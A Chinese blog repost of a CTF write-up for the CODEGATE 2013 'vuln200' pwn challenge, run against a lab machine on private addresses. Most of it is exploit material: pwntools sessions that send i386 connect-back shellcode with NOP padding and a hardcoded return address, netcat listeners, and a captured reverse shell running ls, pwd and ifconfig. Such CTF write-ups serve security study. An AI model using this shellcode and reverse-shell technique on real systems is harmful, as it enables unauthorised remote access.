码迷,mamicode.com
首页 > 其他好文 > 详细

codegate_quals vuln200

时间:2015-12-15 22:45:18      阅读:327      评论:0      收藏:0      [点我收藏+]

标签:

======================= try 1 =======================

from pwn import *

r=remote(‘192.168.1.104‘,7777)

>>> r=remote(‘192.168.1.104‘,7777)

[x] Opening connection to 192.168.1.104 on port 7777

[x] Opening connection to 192.168.1.104 on port 7777: Trying 192.168.1.104

[+] Opening connection to 192.168.1.104 on port 7777: Done

>>> print(r.recv(1024))

CODEGATE 2013 Util service!

[*] md5

[*] help

[*] base64 encode

[*] base64 decode

[*] quit

>>> r.send(‘write‘ + (asm(shellcraft.i386.linux.connect(‘192.168.1.109‘,7777)).ljust(0xf0, ‘\x90‘)+p32(0xbfdf18cc)))

 

攻击端监听服务 :

# strace -f nc -l -p 7777

......

bind(3, {sa_family=AF_INET, sin_port=htons(7777), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1)                            = 0
rt_sigaction(SIGALRM, {SIG_IGN, [ALRM], SA_RESTORER|SA_RESTART, 0x7fc9a4d1f180}, {SIG_DFL, [], 0}, 8) = 0
alarm(0)                                = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
accept(3, {sa_family=AF_INET, sin_port=htons(50967), sin_addr=inet_addr("192.168.1.104")}, [16]) = 4

......

======================= try 2 =======================

攻击端:

r.close()
r=remote(‘192.168.1.104‘,7777)
print(r.recv(1024))
r.send(‘write‘ + (asm(shellcraft.i386.linux.connect(‘192.168.1.109‘,7777)+shellcraft.i386.linux.dupsh(sock=‘ebp‘))).ljust(0xf0, ‘\x90‘)+p32(0xbfdf18cc))

 

 反向shell:

# while [ 1 ];do nc -n -vv -l -p 7777;done
listening on [any] 7777 ...
connect to [192.168.1.109] from (UNKNOWN) [192.168.1.104] 50969
ls
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
pwd
/opt/ctf/pwn/pwntools-write-ups-master/2013/codegate-quals/vuln200
ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:24:54:7b:d2:d9 
          inet addr:192.168.1.104  Bcast:192.168.1.255  Mask:255.255.255.0

......

 

codegate_quals vuln200

标签:

原文地址:http://www.cnblogs.com/scoder/p/5049665.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!